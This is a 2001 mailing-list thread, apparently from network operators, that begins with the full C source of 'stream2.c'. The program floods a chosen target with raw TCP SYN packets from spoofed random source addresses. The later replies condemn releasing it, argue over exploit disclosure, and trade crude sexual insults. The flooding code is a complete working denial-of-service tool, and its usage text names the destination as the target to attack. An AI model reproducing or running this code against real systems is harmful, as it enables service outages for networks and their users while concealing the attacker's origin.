This is thrown together partially from the original sources of stream, and partially from my own ramblings, it was a quick and dirty hack, so there are parts of it that are messy. For testing purposes on a lan, if you want to verify packet headers, and not send as fast as it can, you can define SLOW. This version has the fixed tcp cksum, and a MSS window of compile-time definable size. --- stream2.c --- #include <stdio.h> #include <time.h> #include <stdlib.h> #include <unistd.h> #include <strings.h> #include <sys/time.h> #include <sys/param.h> #include <sys/types.h> #include <sys/socket.h> #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> /* * QUIET controls whether to print out errors (can be very noisy, if this is * undef'd, when buffers are full) * * SLOW adds a nanosleep (rounded to nearest clock tick), for pacing stream * - NOTE: This really slows it down * * TCPFLAGS sets what kind of tcp packets to generate * * _TCP_MSS sets the MSS value (1460 recommended) unless the OS includes have * a value already set */ #define QUIET #undef SLOW #define TCP_FLAGS TH_SYN #ifndef _TCP_MSS #define _TCP_MSS 1460 #endif struct ip_hdr { u_char ip_hl:4, ip_v:4; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; u_char ip_ttl; u_char ip_p; u_short ip_sum; u_long saddr; u_long daddr; }; struct tcp_hdr { u_short th_sport; u_short th_dport; u_long th_seq; u_long th_ack; u_char th_x2:4, th_off:4; u_char th_flags; u_short th_win; u_short th_sum; u_short th_urp; u_char th_option; u_char th_oplen; u_short th_mss; }; struct pseudo_hdr { u_long saddr; u_long daddr; u_char mbz; u_char ptcl; u_short tcpl; }; struct packet { struct ip_hdr ip; struct tcp_hdr tcp; }; struct packet packet; struct pseudo_hdr pseudo; struct sockaddr_in s_in; u_long dstaddr; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s <dstaddr>\n", progname); fprintf(stderr, " dstaddr - the target we are trying to attack.\n"); exit(1); } inline u_short ip_cksum(u_short *ipH, u_short len) { u_short answer; u_long sum = 0; int i; len >>= 1; for(i=0;i<len;i++) sum += (*ipH++); sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return(~sum & 0xffff); } inline u_short tcp_cksum(u_short *ipH, u_short IPlen, u_short *tcpH, u_short TCPlen) { u_short answer; u_long sum = 0; int i; IPlen >>= 1; TCPlen >>= 1; for(i=0;i<IPlen;i++) { sum += htons(*ipH++); } for(i=0;i<TCPlen;i++) { sum += htons(*tcpH++); } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return(~sum & 0xffff); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s.\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { int i; time_t start, end; #ifdef SLOW struct timespec ts; ts.tv_sec = 0; ts.tv_nsec = 1; #endif memset(&packet, 0, sizeof(packet)); packet.ip.ip_hl = 5; packet.ip.ip_v = 4; pseudo.ptcl = packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0x10; packet.ip.ip_id = rand(); packet.ip.ip_len = 0x2C; packet.ip.ip_off = 0x4000; packet.ip.ip_ttl = 64; pseudo.daddr = packet.ip.daddr \ = dstaddr; packet.tcp.th_flags = TCP_FLAGS; packet.tcp.th_win = htons(65535); packet.tcp.th_seq = (random() >> 16); packet.tcp.th_ack = htonl(0); packet.tcp.th_off = 6; /* 6 */ packet.tcp.th_urp = 0; packet.tcp.th_sport = htons(rand()); packet.tcp.th_dport = htons(rand()); packet.tcp.th_option = 0x02; packet.tcp.th_oplen = 0x04; packet.tcp.th_mss = htons(_TCP_MSS); pseudo.mbz = 0; s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = dstaddr; s_in.sin_port = packet.tcp.th_dport; pseudo.tcpl = htons(sizeof(packet.tcp)); srandom((time(NULL) ^ getpid()) + getppid()); for(i=0;;++i) { pseudo.saddr = packet.ip.saddr = random(); while((pseudo.saddr & 0x0A000000) || (pseudo.saddr & 0xACA00000) || (pseudo.saddr & 0xC0A80000) || (pseudo.saddr & 0x7F000000)) pseudo.saddr = packet.ip.saddr = random(); packet.ip.ip_id = rand(); packet.tcp.th_sport = rand(); packet.tcp.th_seq = random() >> 18; packet.tcp.th_dport = s_in.sin_port = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; packet.tcp.th_sum = ntohs(tcp_cksum((void *)&pseudo, sizeof(pseudo), (void *)&packet.tcp, sizeof(packet.tcp))); packet.ip.ip_sum = ip_cksum((void *)&packet.ip, sizeof(packet.ip)); #ifndef QUIET if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) perror("stream"); #else sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)); #endif #ifdef SLOW nanosleep(&ts, NULL); #endif } } int main(int argc, char *argv[]) { int on = 1; printf("stream.c v2.0 - TCP Packet Storm\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 2) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nResolving IPs..."); fflush(stdout); dstaddr = lookup(argv[1]); printf("Sending..."); fflush(stdout); flooder(); return 0; }
Excuse me susan. Dont read any further. Jason: Why must you - and other people - be so fucking stupid? Why not release a technical explanation of a problem, or something in a package, network stack, operating system or (*) - in a logical, "Hey, here's a problem, I think we should figure out how to fix it" or "Hey, here's a problem, and here's how I think it can be fixed" manner? Are you twelve? Do you think youre gonna get sucked off more now (or perhaps, more accurately, sucked off period) now that the #chix-with-big-tits IRC channel knows that you released something that's gonna be a pain in engineers' asses all over the world? You've gained no respect here. On Tue, Jan 30, 2001 at 09:42:23PM -0500, Jason Legate wrote:
This is thrown together partially from the original sources of stream, and partially from my own ramblings, it was a quick and dirty hack, so there are parts of it that are messy. For testing purposes on a lan, if you want to verify packet headers, and not send as fast as it can, you can define SLOW.
This version has the fixed tcp cksum, and a MSS window of compile-time definable size.
-- i am jamie at arpa dot com .. and this is my .sig. core1.dns.microsoft.com# sho access-list 101 Extended IP access list 101 deny udp any any eq domain (874572345872345 matches)
This is the type of behavior I was talking about when I coined the term cyber-terrorism. Releasing such code for the use of others in public forum, will harm the fabric of the network, is an overt act of terrorism in its final result. I hope when they the FBI catch up with you, they pipe sunlight and air to you. jamie rishaw wrote:
Excuse me susan. Dont read any further.
Jason:
Why must you - and other people - be so fucking stupid?
Why not release a technical explanation of a problem, or something in a package, network stack, operating system or (*) - in a logical, "Hey, here's a problem, I think we should figure out how to fix it" or "Hey, here's a problem, and here's how I think it can be fixed" manner?
Are you twelve?
Do you think youre gonna get sucked off more now (or perhaps, more accurately, sucked off period) now that the #chix-with-big-tits IRC channel knows that you released something that's gonna be a pain in engineers' asses all over the world?
You've gained no respect here.
On Tue, Jan 30, 2001 at 09:42:23PM -0500, Jason Legate wrote:
This is thrown together partially from the original sources of stream, and partially from my own ramblings, it was a quick and dirty hack, so there are parts of it that are messy. For testing purposes on a lan, if you want to verify packet headers, and not send as fast as it can, you can define SLOW.
This version has the fixed tcp cksum, and a MSS window of compile-time definable size.
-- i am jamie at arpa dot com .. and this is my .sig.
core1.dns.microsoft.com# sho access-list 101 Extended IP access list 101 deny udp any any eq domain (874572345872345 matches)
-- Thank you; |--------------------------------| | Thinking is a learned process. | | ICANN member @large | | Gigabit over IP, ieee 802.17 | | working group | | Resilient Packet Transport | |--------------------------------| Henry R. Linneweh
Guys, there is no way this group is going to resolve this huge difference of opinion in the industry in this occurance of the thread, any more than we did the last 53 times it occurred here, or the thousands of other times it's been fought across the 'net. The fact that it started out with the childish insults in the SECOND email in the entire thread should be ample proof of that. There is a huge segment of the industry that thinks publishing exploits is a bad thing, which will result in people getting hurt. This segment includes some of the best and brightest in our ranks, and they use well-reasoned logical arguments to prove their case. There is a huge segment of the industry that thinks that publishing exploits is a good thing, which will result in problems that have lingered for years getting fixed. This segment includes some of the best and brightest in our ranks, and they use well-reasoned logical arguments to prove their case. So can we just shut the eff up about the whole argument and go on with our lives, please? Go argue about this over in Bugtraq or something.
On Tue, Jan 30, 2001 at 09:42:23PM -0500, Jason Legate wrote:
This is thrown together partially from the original sources of stream, and partially from my own ramblings, it was a quick and dirty hack, so there are parts of it that are messy. For testing purposes on a lan, if you want to verify packet headers, and not send as fast as it can, you can define SLOW.
Thank you for making available code that now _all_ the packet kids can use. Releasing this doesn't prove any theories, expose something new, or have any redeemable value whatsoever. The sound everyone hears is a collective orgasm of 12-year-olds with linux machines everywhere. ... or maybe they just saw http://www.tch.org/~ser/wtf2.jpg recently. -- Bill Fumerola <billf@FreeBSD.org>
At 21:18 30/01/01 -0600, Bill Fumerola wrote:
On Tue, Jan 30, 2001 at 09:42:23PM -0500, Jason Legate wrote:
This is thrown together partially from the original sources of stream, and partially from my own ramblings, it was a quick and dirty hack, so there are parts of it that are messy. For testing purposes on a lan, if you want to verify packet headers, and not send as fast as it can, you can define SLOW.
Thank you for making available code that now _all_ the packet kids can use. Releasing this doesn't prove any theories, expose something new, or have any redeemable value whatsoever. The sound everyone hears is a collective orgasm of 12-year-olds with linux machines everywhere.
... or maybe they just saw http://www.tch.org/~ser/wtf2.jpg recently.
No reason to include that JPG! -Hank
-- Bill Fumerola <billf@FreeBSD.org>
Agreed. Now my eyes have been given a denial of service. :-( I think I have been damaged more by the JPG than the software that prompted the posting. :-( -Paul On Wed, 31 Jan 2001, Hank Nussbacher wrote:
... or maybe they just saw http://www.tch.org/~ser/wtf2.jpg recently.
No reason to include that JPG!
-Hank
-- Bill Fumerola <billf@FreeBSD.org>
By popular request my signature has moved to <http://198.87.147.226/paulsig.txt> Paul Timmins paul@timmins.net http://www.timmins.net/ "By definition, if you don't stand up for anything, you stand for nothing." ---Paul Timmins
participants (7)
-
Bill Fumerola
-
Hank Nussbacher
-
Henry R. Linneweh
-
jamie rishaw
-
Jason Legate
-
Paul Timmins
-
Shawn McMahon